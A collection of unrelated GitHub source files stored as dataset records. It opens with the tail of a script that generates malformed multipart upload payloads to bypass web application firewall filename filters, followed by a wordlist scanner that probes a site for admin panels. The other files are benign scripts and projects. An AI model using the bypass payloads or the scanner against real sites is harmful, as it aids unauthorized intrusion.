multipart/form-data; boundary=boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\";\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n1\\r\r\n--boundary=''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--boundary=''' + boundary + b'''--\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\\'''' + name + b'''\\'''' + name + b'''\";\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n1\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\nb'''Content-Type: multipart/form-data; boundary=''' + boundary + b'''\\r\r\n\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b''']\";\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n1\\r\r\n--''' + boundary + b'''\\r\r\nContent-Disposition: form-data; name=\"''' + name + b'''\"; filename=\"''' + filename + b'''.''' + suffix + b'''\"\\r\r\nContent-Type: ''' + Content_Type + b'''\\r\r\n\\r\r\n''' + content + b'''\\r\r\n--''' + boundary,#\r\n ]\r\n##################################################################################################\r\nfor i in Content_Disposition_list:\r\n payloads.append(generate(Content_Disposition = i))\r\n\r\nfor i in Content_Type1_list:\r\n payloads.append(generate(Content_Type1 = i))\r\n\r\nfor i in Content_Type2_list:\r\n payloads.append(generate(Content_Type2 = i))\r\n\r\nfor i in other_list:\r\n payloads.append(generate_other(body = i))\r\n\r\npayloads_string = ''\r\nfor i in payloads:\r\n payloads_string += i.decode('utf8')+'\\n'\r\n\r\npyperclip.copy(payloads_string)\r\n\r\n","repo_name":"maybe-why-not/upload_waf_filename_bypass","sub_path":"upload_waf_filename_bypass.py","file_name":"upload_waf_filename_bypass.py","file_ext":"py","file_size_in_byte":21776,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"39004980133","text":"# pip install requests\nimport requests\n# pip install colorama\nfrom colorama import init\nfrom colorama import Fore as c \nfrom colorama import Style as s\n\nimport json\n\ninit()\n\nclass LoAd :\n def __init__(self, url):\n self.session = requests.Session()\n try:\n if self.session.get(\"https://\"+url).status_code != 200:\n raise \n except :\n raise Exception(\"Invalid URL\")\n self.url = url\n self.words = []\n self.possible = {}\n self.include_wordlist()\n try : \n self.checker()\n print(c.GREEN + \"Done\" + c.RESET)\n except KeyboardInterrupt:\n print(c.RED + \"\\n Exiting...\" + c.RESET)\n print(c.GREEN + \"Possible Admin Panels :\" + c.RESET)\n for u,s in self.possible.items():\n print(f\"{c.GREEN}{u} {c.YELLOW}>>> {c.BLUE}{s} \")\n if input(f\"{c.RED}Do You Want To Save The Results [y/N] ? 
{c.RESET}\").upper() == \"Y\":\n with open(f\"{self.url}.results.json\", 'w') as f:\n json.dump(self.possible, f)\n print(f\"{c.GREEN}Results Saved To {self.url}.results.json\")\n exit()\n \n def checker(self):\n for ind , word in enumerate(self.words):\n url = f\"https://{self.url}/{word}\"\n r = self.session.get(url).status_code\n if r != 404:\n print(f\"{c.GREEN }Possible Admin Panel : {c.RED}{url}{c.RESET}\")\n self.possible[url] = r\n else:\n print(f\"{c.BLUE}Try : {c.YELLOW} {ind+1} {c.RED}FAILED{c.RESET}\")\n\n def include_wordlist(self):\n try :\n with open(\"wordlist.txt\", 'r') as f:\n [ self.words.append(line.strip()) for line in f ]\n except:\n raise Exception(\"Wordlist not found\")\n print(c.GREEN + \"Wordlist loaded\" + c.RESET)\n print(c.GREEN + \"Total words: \" + str(len(self.words)) + c.RESET)\nif __name__ == \"__main__\":\n url = input(\"Enter the url: \")\n main = LoAd(url)\n\n\n","repo_name":"shervin1385/locate-admin","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26306210927","text":"# -*- coding: utf-8 -*-\nimport collections\nimport datetime\nimport requests, execjs, json\nimport time\nimport wordcloud\nimport jieba\nimport PIL.Image as image\nimport numpy as np\nimport matplotlib.pyplot as plt # 图像展示库\n\n\ndef get_comments(song_id): # 获取 2020-09-16 --- 2020-08-27的评论信息\n headers = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36',\n 'accept': '*/*',\n }\n\n with open('code.js', encoding='utf8') as f1:\n js = f1.read()\n js_tool = execjs.compile(js) #加密函数,上一篇里有提到\n\n now_day = datetime.date.today() #当天日期\n flag_info = None #重复评论标志\n num = 0\n for i in range(20, -1, -1): # 获取 2020-08-27---2020-09-16 的日期\n pre_day = str(now_day - datetime.timedelta(days=i)) + ' 23:59:59' # 获取T+1日期\n # 先转换为时间数组\n timeArray = time.strptime(pre_day, \"%Y-%m-%d %H:%M:%S\")\n # 转换为时间戳\n cursor = str(int(time.mktime(timeArray))) + '000' # 拼接成13位时间戳\n print(pre_day, cursor)\n # 评论接口参数\n param = {\"rid\": \"R_SO_4_\" + song_id, \"threadId\": \"R_SO_4_\" + song_id, \"pageNo\": \"1\", \"pageSize\": \"1000\",\n \"cursor\": cursor, \"offset\": \"0\", \"orderType\": \"1\", \"csrf_token\": \"ff57cff46ebe79b9a51dd10f8c9181bb\"}\n pdata = js_tool.call('d', str(param))\n response = requests.post('https://music.163.com/weapi/comment/resource/comments/get', headers=headers,data=pdata)\n # 获取评论信息\n data = json.loads(response.text)['data']\n comments = data.get('comments')\n # 存储评论信息\n with open('comments.txt', 'a', encoding='utf8') as f:\n for comment in comments:\n info = comment.get('content')\n if flag_info == info: # 取到重复的评论则跳出循环,防止重复获取\n break\n print(info)\n f.write(info + '\\n')\n # folow_comments = comment.get('beReplied') # 附加的评论,暂不获取\n # if folow_comments:\n # for folow_comment in folow_comments:\n # print(folow_comment.get('content'))\n num += 1 # 获取评论数+1\n flag_info = comments[0]['content'] # 取每次请求的第一条\n print('每次请求的第一条', flag_info, '\\n')\n print('获取评论数:', num)\n\n\n# 分词\ndef fc_CN(text):\n # 接收分词的字符串\n word_list = jieba.cut(text)\n # 分词后在单独个体之间加上空格\n result = \" \".join(word_list)\n return result\n\n# 输出云词\ndef word_cloud():\n with open(\"./comments.txt\", encoding='utf8') as fp:\n text = fp.read()\n # 将读取的中文文档进行分词\n text = fc_CN(text).replace('\\n', '').split(' ')\n # 过滤部分分词\n filter_str = ['的', ',', '了', '我', '[', '你', '是', '就', ']', '!', '。', '?', '这', '不', '也', 
'都', '吧', '啊', '在',\n '吗', '和', '吗', '听', '有', '说', '去', '好', '人', '给', '他', '…', '小', '来', '还', '没', '一', '']\n new_text = []\n for data in text:\n if data not in filter_str:\n new_text.append(data)\n print(new_text)\n # 词频统计\n word_counts = collections.Counter(new_text) # 对分词做词频统计\n word_counts_top10 = word_counts.most_common(10) # 获取前10最高频的词\n print(word_counts_top10) # 输出检查\n\n # 词频展示\n mask = np.array(image.open('./love.jpg')) # 定义词频背景\n wc = wordcloud.WordCloud(\n # background_color='white', # 设置背景颜色\n font_path='C:\\Windows\\Fonts\\simhei.TTF', # 设置字体格式\n mask=mask, # 设置背景图\n max_words=200, # 最多显示词数\n max_font_size=300, # 字体最大值\n # scale=32 # 调整图片清晰度,值越大越清楚\n )\n\n wc.generate_from_frequencies(word_counts) # 从字典生成词云\n image_colors = wordcloud.ImageColorGenerator(mask) # 从背景图建立颜色方案\n wc.recolor(color_func=image_colors) # 将词云颜色设置为背景图方案\n wc.to_file(\"./temp.jpg\") # 将图片输出为文件\n plt.imshow(wc) # 显示词云\n plt.axis('off') # 关闭坐标轴\n plt.show() # 显示图像\n\n\nif __name__ == '__main__':\n # 歌曲id\n song_id = '1474342935'\n get_comments(song_id)\n word_cloud()\n","repo_name":"934050259/wyy_comments","sub_path":"wyy_comment.py","file_name":"wyy_comment.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"2133292707","text":"from particle_object import Particle\n\n# Colors\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\n# Constants\nWINDOWS_WIDTH = 1100\nWINDOWS_HEIGHT = 700\nSPRITE_FOLDER_ROUTE = '../sprites/'\n\n# Constants for WorldObject class\nCOLORKEY = RED\nSTART_VX = 0\nSTART_VY = -2\nSIZE_X = 291\nSIZE_Y = 154\nGRAVITY = False\n\n\nclass PlayerGhost(Particle): # Players angel ghost particle class\n\n def __init__(self, x, y, object_id, character):\n super().__init__(character + '_angel', COLORKEY, x, y, SIZE_X, SIZE_Y, START_VX, START_VY, GRAVITY,\n object_id)\n self.character = character\n # End __init__\n","repo_name":"linkmanrs/cubix","sub_path":"code/cuby_angel.py","file_name":"cuby_angel.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43545874857","text":"import cv2 as cv\nimport numpy as np\n\nimg = cv.imread(\"Resources/test.jpg\")\n\nimgHor= np.hstack((img,img))\nimgVer= np.vstack((img,img))\n\ncv.imshow(\"Horizontal img\",imgHor)\ncv.imshow(\"vertical img\",imgVer)\n\ncv.waitKey(0)","repo_name":"KrishnenduDakshi2002/Python-learning","sub_path":"opencv/join_img.py","file_name":"join_img.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36315337842","text":"'''\n给定一个正整数,输出它的补数。补数是对该数的二进制表示取反。\n\n注意:\n给定的整数保证在32位带符号整数的范围内。\n你可以假定二进制数不包含前导零位。\n\n示例 1:\n输入: 5\n输出: 2\n解释: 5的二进制表示为101(没有前导零位),其补数为010。所以你需要输出2。\n\n示例 2:\n输入: 1\n输出: 0\n解释: 1的二进制表示为1(没有前导零位),其补数为0。所以你需要输出0。\n'''\n\nclass Solution:\n def findComplement(self, num: int) -> int:\n binary=bin(num)\n binary2='0b'\n for i in binary[2:]:\n if i=='0':\n binary2=binary2+'1'\n else :\n binary2=binary2+'0'\n return int(binary2,2)\n\n'''\n执行用时 : 52 ms, 在Number Complement的Python3提交中击败了84.16% 的用户\n内存消耗 : 13.1 MB, 在Number Complement的Python3提交中击败了61.29% 的用户\n'''\n\nclass Solution:\n def findComplement(self, num: int) -> int:\n return int(bin(num)[2:].replace('0', '2').replace('1', '0').replace('2', '1'), 
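The word_cloud() pipeline above reduces to tokenize, drop stop-words, count. The counting half isolated with collections.Counter (English stand-in tokens and a shortened stop-word set, since jieba only matters for Chinese segmentation):

from collections import Counter

tokens = "the cat sat on the mat the end".split()
stop_words = {"the", "on"}
counts = Counter(t for t in tokens if t not in stop_words)
print(counts.most_common(3))  # [('cat', 1), ('sat', 1), ('mat', 1)]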
2)","repo_name":"GuocaiL/AlgorithmExe","sub_path":"leetcode/Number_Complement_476.py","file_name":"Number_Complement_476.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"109831535","text":"from keras.layers import Dense, Flatten\nfrom keras.layers.recurrent import LSTM, GRU\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam, RMSprop\nfrom keras.layers.wrappers import TimeDistributed\nfrom keras.layers import Conv2D, MaxPooling3D, Conv3D, MaxPooling2D, Activation, Input\nfrom keras import backend as K\nfrom sequence_generator import DataGenerator\nfrom keras.regularizers import l2\nfrom keras.layers.normalization import BatchNormalization\n\nimport os\nimport matplotlib.pyplot as plt\n\n############## Globals #############\n# Defines the global variables for #\n# batch size, epochs and classes #\n####################################\n\nBATCH = 18\nEPOCH = 1\nCLASSES = 3\nSEQ_LEN = 8\nTRAIN_DIR = os.path.abspath('../data/train')\nVAL_DIR = os.path.abspath('../data/val')\n\n########### End Globals ############\n\nclass CNN_LSTM():\n\n\t@staticmethod\n\tdef build_model(ip_shape, nb_classes):\n\t\tdef add_block(model, num_filters, kernel_dim, init, reg, padding='valid'):\n\t\t\tx = TimeDistributed(Conv2D(num_filters,\n\t\t\t kernel_size=kernel_dim,\n\t\t\t padding=padding,\n\t\t\t kernel_initializer=init,\n\t\t\t kernel_regularizer=l2(reg)))(model)\n\t\t\tx = TimeDistributed(BatchNormalization())(x)\n\t\t\tx = TimeDistributed(Activation('relu'))(x)\n\t\t\treturn x\n\n\t\tinitialiser = 'glorot_uniform'\n\t\treg_lambda = 0.001\n\n\t\tinput = Input(shape=ip_shape)\n\t\t# input2 = Input(shape=ip_shape)\n\n\t\tb1 = add_block(input, 32, 7, initialiser, reg_lambda, 'same')\n\t\tb2 = add_block(b1, 32, 3, initialiser, reg_lambda)\n\t\tpool1 = TimeDistributed(MaxPooling2D((2, 2), strides=2))(b2)\n\n\t\tb3 = add_block(pool1, 64, 3, initialiser, reg_lambda, 'same')\n\t\tb4 = add_block(b3, 64, 3, initialiser, reg_lambda, 'same')\n\t\tpool2 = TimeDistributed(MaxPooling2D((2, 2), strides=2))(b4)\n\n\t\tb5 = add_block(pool2, 64, 3, initialiser, reg_lambda, 'same')\n\t\tb6 = add_block(b5, 64, 3, initialiser, reg_lambda, 'same')\n\t\tpool3 = TimeDistributed(MaxPooling2D((2, 2), strides=2))(b6)\n\n\t\tb7 = add_block(pool3, 64, 3, initialiser, reg_lambda, 'same')\n\t\tb8 = add_block(b7, 64, 3, initialiser, reg_lambda, 'same')\n\t\tpool4 = TimeDistributed(MaxPooling2D((2, 2), strides=2))(b8)\n\n\t\tb9 = add_block(pool4, 64, 3, initialiser, reg_lambda, 'same')\n\t\tb10 = add_block(b9, 64, 3, initialiser, reg_lambda, 'same')\n\t\tpool5 = TimeDistributed(MaxPooling2D((2, 2), strides=2))(b10)\n\n\t\t# LSTM output head\n\t\tflat = TimeDistributed(Flatten())(pool5)\n\n\t\tlstm = LSTM(256, return_sequences=False, dropout=0.5)(flat)\n\t\t# gru = GRU(256, return_sequences=False,dropout=0.5)(flat)\n\t\toutput = Dense(nb_classes, activation='softmax')(lstm)\n\n\t\tmodel = Model(inputs=input, outputs=output)\n\n\t\treturn model\n\ndef train():\n\tif K.backend() == 'tensorflow':\n\t\tK.common.set_image_dim_ordering(\"th\")\n\n\tif K.image_data_format() == 'channels_first':\n\t\tIP_SHAPE = (SEQ_LEN, 3, 224, 224)\n\telse:\n\t\tIP_SHAPE = (SEQ_LEN, 224, 224, 3)\n\n\ttr_data_gen = DataGenerator('../data', SEQ_LEN, 'train', BATCH, (224, 224))\n\tnum_train = tr_data_gen.__len__()\n\n\tval_data_gen = DataGenerator('../data', SEQ_LEN, 'val', BATCH, (224, 224))\n\tnum_val = 
val_data_gen.__len__()\n\n\tmodel = CNN_LSTM().build_model(IP_SHAPE, CLASSES)\n\tmodel.summary()\n\t# Now compile the network.\n\toptimizer = Adam(lr=1e-5, decay=1e-6)\n\tmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n\thistory = model.fit_generator(generator=tr_data_gen,\n\t steps_per_epoch=num_train // BATCH,\n\t validation_data=val_data_gen,\n\t validation_steps=num_val,\n\t epochs=EPOCH, verbose=1, workers=4\n\t )\n\n\tscore = model.evaluate_generator(val_data_gen, steps=num_val)\n\tprint(\"Test Loss: \", score[0])\n\tprint(\"Test accuracy: \", score[1] * 100)\n\tplt.plot(history.history['acc'],\n\t label='Train Accuracy', color='red')\n\tplt.plot(history.history['val_acc'],\n\t label='Validation Accuracy')\n\tplt.title('Accuracy of training and validation')\n\tplt.legend()\n\tplt.show()\n\ntrain()\n","repo_name":"raviabhiram/monitoring-people-using-deep-learning","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39727732026","text":"from hashlib import md5\r\nfrom time import localtime\r\nfrom app.error_codes import ERRORS_DESCRIPTION, ERRORS_STATUS_CODE\r\n\r\ndef JSONResponse(data=None, message=None, code=None, status=200):\r\n\r\n\tif (not message and code) and code in ERRORS_DESCRIPTION:\r\n\t\tmessage = ERRORS_DESCRIPTION.get(code,\"\")\r\n\r\n\tif code and code in ERRORS_STATUS_CODE:\r\n\t\tstatus = ERRORS_STATUS_CODE.get(code)\r\n\r\n\tif code or status not in [200, 201]:\r\n\t\treturn {\r\n\t\t\t\"code\": code,\r\n\t\t\t\"message\": message,\r\n\t\t\t\"status\": status,\r\n\t\t\t\"data\":data\r\n\t\t}, status\r\n\telse:\r\n\t\treturn data\r\n\r\ndef get_public_id(unique_id):\r\n\treturn md5(str(unique_id).encode(\"UTF-8\")).hexdigest()\r\n\r\n","repo_name":"keosariel/Linktree-API","sub_path":"app/utils/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"72565777474","text":"'''\n\nDescription:\n\nGiven an integer n. Each number from 1 to n is grouped according to the sum of its digits. \n\nReturn how many groups have the largest size.\n\n \n\nExample 1:\n\nInput: n = 13\nOutput: 4\nExplanation: There are 9 groups in total, they are grouped according to the sum of its digits of numbers from 1 to 13:\n[1,10], [2,11], [3,12], [4,13], [5], [6], [7], [8], [9]. 
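The CNN-LSTM in train.py above wraps every convolutional layer in TimeDistributed so one shared 2-D CNN is applied to each frame of a sequence before the LSTM aggregates over time. A minimal shape check of that pattern (Keras 2.x API, matching the imports used above; the frame count and image size here are toy values):

from keras.models import Sequential
from keras.layers import TimeDistributed, Conv2D, Flatten, LSTM, Dense

model = Sequential([
    # 8 frames of 64x64 RGB; the Conv2D weights are shared across frames.
    TimeDistributed(Conv2D(16, 3, activation='relu'), input_shape=(8, 64, 64, 3)),
    TimeDistributed(Flatten()),
    LSTM(32),                       # collapses the time axis
    Dense(3, activation='softmax')
])
model.summary()  # final output shape: (None, 3)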
There are 4 groups with largest size.\n\n\n\nExample 2:\n\nInput: n = 2\nOutput: 2\nExplanation: There are 2 groups [1], [2] of size 1.\n\n\n\nExample 3:\n\nInput: n = 15\nOutput: 6\n\n\n\nExample 4:\n\nInput: n = 24\nOutput: 5\n \n\nConstraints:\n\n1 <= n <= 10^4\n\n'''\n\n\n\nfrom collections import defaultdict\n\nclass Solution:\n \n def digitsum( self, x ):\n \n s = 0\n \n while x:\n q, r = divmod( x, 10)\n s += r\n x = q\n \n return s\n \n \n \n def countLargestGroup(self, n: int) -> int:\n \n digitsum_num_dict = defaultdict( list )\n \n for number in range(1,n+1):\n \n digit_sum = self.digitsum( number )\n \n digitsum_num_dict[digit_sum].append( number )\n \n \n max_size, max_grp_cnt = 0, 0\n \n for digitsum in digitsum_num_dict:\n \n cur_size = len( digitsum_num_dict[digitsum] )\n if cur_size > max_size:\n max_size = cur_size\n max_grp_cnt = 1\n \n elif cur_size == max_size:\n max_grp_cnt += 1\n \n \n return max_grp_cnt\n\n\n\n# n : the value of input\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of loop, which is of O( n ).\n\n## Space Complexity: O( n )\n#\n# The overhead in space is the storage for dictionary, digitsum_num_dict, which is of o( n ).\n\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 'n')\ndef test_bench():\n\n test_data = [\n TestEntry( n = 13),\n TestEntry( n = 2),\n TestEntry( n = 15),\n TestEntry( n = 24),\n TestEntry( n = 1),\n TestEntry( n = 1000),\n ]\n\n # expected output:\n '''\n 4\n 2\n 6\n 5\n 1\n 2\n '''\n for t in test_data:\n print( Solution().countLargestGroup( n = t.n ) )\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"No_1399_Count Largest Group/by_dictionary.py","file_name":"by_dictionary.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"10234289446","text":"# -*- coding: utf-8 -*-\nfrom openerp import fields, models\n\n\nclass res_company(models.Model):\n _inherit = \"res.company\"\n\n responsability_id = fields.Many2one(\n related='partner_id.responsability_id',\n relation='sii.responsability',\n string=\"Responsability\",)\n start_date = fields.Date(\n related='partner_id.start_date',\n string='Start-up Date',)\n invoice_vat_discrimination_default = fields.Selection(\n [('no_discriminate_default', 'Yes, No Discriminate Default'),\n ('discriminate_default', 'Yes, Discriminate Default')],\n 'Invoice VAT discrimination default',\n default='no_discriminate_default',\n required=True,\n help=\"\"\"Define behaviour on invoices reports. 
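The digitsum helper above peels digits with divmod; an equivalent and common shortcut sums the characters of str(x). Both agree, for example:

def digitsum_divmod(x: int) -> int:
    s = 0
    while x:
        x, r = divmod(x, 10)  # strip the last digit each pass
        s += r
    return s

def digitsum_str(x: int) -> int:
    return sum(int(c) for c in str(x))

assert all(digitsum_divmod(n) == digitsum_str(n) for n in range(1, 1000))
print(digitsum_divmod(13))  # 4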
Discrimination or not \\\n will depend in partner and company responsability and SII letters\\\n setup:\n * If No Discriminate Default, if no match found it won't \\\n discriminate by default.\n * If Discriminate Default, if no match found it would \\\n discriminate by default.\n \"\"\")\n tp_sii_code = fields.Char(\n 'Tax Payer SII Code', related='partner_id.tp_sii_code', readonly=True)\n\n","repo_name":"odoo-chile/l10n_cl_invoice","sub_path":"models/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"2850032443","text":"from residual_optimization.envs.sine_collision_stiffness_estimator_env import SineCollisionStiffnessEstimator\nfrom residual_optimization.controllers.admittance_controller_1d import AdmittanceController1D\nimport numpy as np\n\nimport matplotlib.pyplot as plt\nimport cvxpy as cp\n\nsolvers = ['OSQP', 'ECOS', 'SCS']\nsolver_durations = []\n\n# Plot variables\nfig = plt.figure()\nlinewidth = 0.7\n\nfor solver in solvers:\n np.random.seed(42)\n\n # Gym environment\n env = SineCollisionStiffnessEstimator(\n testing=False,\n alpha=0.1,\n beta=10,\n time_start=1,\n time_stop=5,\n K_e_tilde_std=500,\n dt=0.01,\n solver=solver\n )\n\n # Trajectory definitions\n time = env.time\n num_samples = len(time)\n x_d = env.x_d\n f_d = env.f_d\n x_c = np.zeros_like(x_d, dtype=np.float64)\n x_e = np.zeros_like(x_d, dtype=np.float64)\n f_e = np.zeros_like(f_d, dtype=np.float64)\n u_h = np.zeros_like(f_d, dtype=np.float64)\n u_r = np.zeros_like(f_d, dtype=np.float64)\n u = np.zeros_like(f_d, dtype=np.float64)\n\n # Visualization\n obs = env.reset()\n for t in range(len(time)):\n obs, info = env.step()\n \n # Add to plot\n x_c[t] = info['x_o']\n x_e[t] = info['x_e']\n u_h[t] = info['u_h']\n u_r[t] = info['u_r']\n u[t] = info['u']\n f_e[t] = info['f_e']\n\n nonzero_indexes = np.nonzero(env.residual_controller_durations)\n nonzero_residual_controller_durations = env.residual_controller_durations[nonzero_indexes]\n print(f'[INFO] Solver: {solver}')\n print('[INFO] Avg duration for residual controller: {:.4f}'.format(nonzero_residual_controller_durations.mean()))\n print('[INFO] Std duration for residual controller: {:.4f}'.format(nonzero_residual_controller_durations.std()))\n print('[INFO] Max duration for residual controller: {:.4f}'.format(nonzero_residual_controller_durations.max()))\n print('[INFO] Min duration for residual controller: {:.4f}'.format(nonzero_residual_controller_durations.min()))\n \n plt.plot(time, env.residual_controller_durations[:-1], linestyle='-', label=solver, linewidth=linewidth)\n\nplt.ylabel('sec / iteration')\nplt.xlabel('Time (sec)')\nplt.legend()\nplt.xlabel(f\"Benchmark over {num_samples} iterations\") \nplt.show()\n","repo_name":"bglima/residual-optimization-gym","sub_path":"tests/test_durations_plot_combined.py","file_name":"test_durations_plot_combined.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25447156734","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n\ndef k_means(img, K, text):\n vectorized = img.reshape((-1, 3))\n vectorized = np.float32(vectorized)\n\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n\n attempts = 10\n ret, label, center = cv2.kmeans(vectorized, K, None, criteria, attempts, cv2.KMEANS_PP_CENTERS)\n\n center = np.uint8(center)\n res = 
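The solver benchmark above collects per-iteration durations and reports avg/std/max/min over the nonzero entries. That reporting pattern in isolation, with a stand-in workload replacing the actual controller step:

import time
import numpy as np

durations = []
for _ in range(100):
    t0 = time.perf_counter()
    sum(i * i for i in range(10_000))   # stand-in workload, not the real solve
    durations.append(time.perf_counter() - t0)

d = np.array(durations)
print('avg {:.6f}  std {:.6f}  max {:.6f}  min {:.6f}'.format(
    d.mean(), d.std(), d.max(), d.min()))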
center[label.flatten()]\n result_image = res.reshape(img.shape)\n\n edges = cv2.Canny(result_image, 1, 1)\n return edges\n\n\noriginal_image = cv2.imread(\"panda.jpg\")\nimg_0 = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)\n\nK = 20\nn = 8\n\nkernel = np.ones((5, 5), np.uint8) / 25\nimg = cv2.filter2D(img_0, -1, kernel)\nfor i in range(n):\n img = cv2.filter2D(img, -1, kernel)\nres_img1 = k_means(img, K, 'Segmented Image - filter2D')\n\nimg = cv2.bilateralFilter(img_0,9,75,75)\nfor i in range(n):\n img = cv2.bilateralFilter(img,9,75,75)\nres_img2 = k_means(img, K, 'Segmented Image - bilateralFilter')\n\nimg = cv2.medianBlur(img_0, 5)\nfor i in range(n):\n img = cv2.medianBlur(img, 5)\nres_img3 = k_means(img, K, 'Segmented Image - medianBlur')\n\nimg = cv2.GaussianBlur(img_0,(5,5),0)\nfor i in range(n):\n img = cv2.GaussianBlur(img,(5,5),0)\nres_img4 = k_means(img, K, 'Segmented Image - GaussianBlur')\n\nfigure_size = 15\n\nplt.figure(figsize=(figure_size, figure_size))\nplt.subplot(2, 3, 5), plt.imshow(res_img1, cmap='gray_r')\nplt.title('Segmented Image - filter2D'), plt.xticks([]), plt.yticks([])\nplt.subplot(2, 3, 2), plt.imshow(res_img2, cmap='gray_r')\nplt.title('Segmented Image - bilateralFilter'), plt.xticks([]), plt.yticks([])\nplt.subplot(2, 3, 3), plt.imshow(res_img3, cmap='gray_r')\nplt.title('Segmented Image - medianBlur'), plt.xticks([]), plt.yticks([])\nplt.subplot(2, 3, 4), plt.imshow(res_img4, cmap='gray_r')\nplt.title('Segmented Image - GaussianBlur'), plt.xticks([]), plt.yticks([])\nplt.subplot(2, 3, 1), plt.imshow(img_0, cmap='gray_r')\nplt.title('Original'), plt.xticks([]), plt.yticks([])\n\nplt.show()\n","repo_name":"sabwally/ColoringBook","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30129274023","text":"\"\"\"\r\nprojekt_1.py: první projekt do Engeto Online Python Akademie\r\nauthor: Adam Kušnir\r\nemail: adamkushnir@outlook.cz\r\ndiscord: Adam K. ASYPRO_AK#2480\r\n\"\"\"\r\ntext = {1: '''\r\nSituated about 10 miles west of Kemmerer,\r\nFossil Butte is a ruggedly impressive\r\ntopographic feature that rises sharply\r\nsome 1000 feet above Twin Creek Valley\r\nto an elevation of more than 7500 feet\r\nabove sea level. The butte is located just\r\nnorth of US 30N and the Union Pacific Railroad,\r\nwhich traverse the valley. ''',\r\n2: '''At the base of Fossil Butte are the bright\r\nred, purple, yellow and gray beds of the Wasatch\r\nFormation. Eroded portions of these horizontal\r\nbeds slope gradually upward from the valley floor\r\nand steepen abruptly. Overlying them and extending\r\nto the top of the butte are the much steeper\r\nbuff-to-white beds of the Green River Formation,\r\nwhich are about 300 feet thick.''',\r\n3: '''The monument contains 8198 acres and protects\r\na portion of the largest deposit of freshwater fish\r\nfossils in the world. The richest fossil fish deposits\r\nare found in multiple limestone layers, which lie some\r\n100 feet below the top of the butte. The fossils\r\nrepresent several varieties of perch, as well as\r\nother freshwater genera and herring similar to those\r\nin modern oceans. 
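The essential cv2.kmeans call pattern from the segmentation script above, run on a tiny synthetic image so it executes without panda.jpg (K lowered to 2 accordingly):

import numpy as np
import cv2 as cv

img = np.random.randint(0, 255, (8, 8, 3), np.uint8)      # stand-in image
pixels = np.float32(img.reshape(-1, 3))                   # one row per pixel
criteria = (cv.TERM_CRITERIA_EPS + cv.TERM_CRITERIA_MAX_ITER, 10, 1.0)
_, labels, centers = cv.kmeans(pixels, 2, None, criteria, 10,
                               cv.KMEANS_PP_CENTERS)
# Map every pixel to its cluster centre: a 2-colour quantized image.
quantized = np.uint8(centers)[labels.flatten()].reshape(img.shape)
print(quantized.shape, len(np.unique(quantized.reshape(-1, 3), axis=0)))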
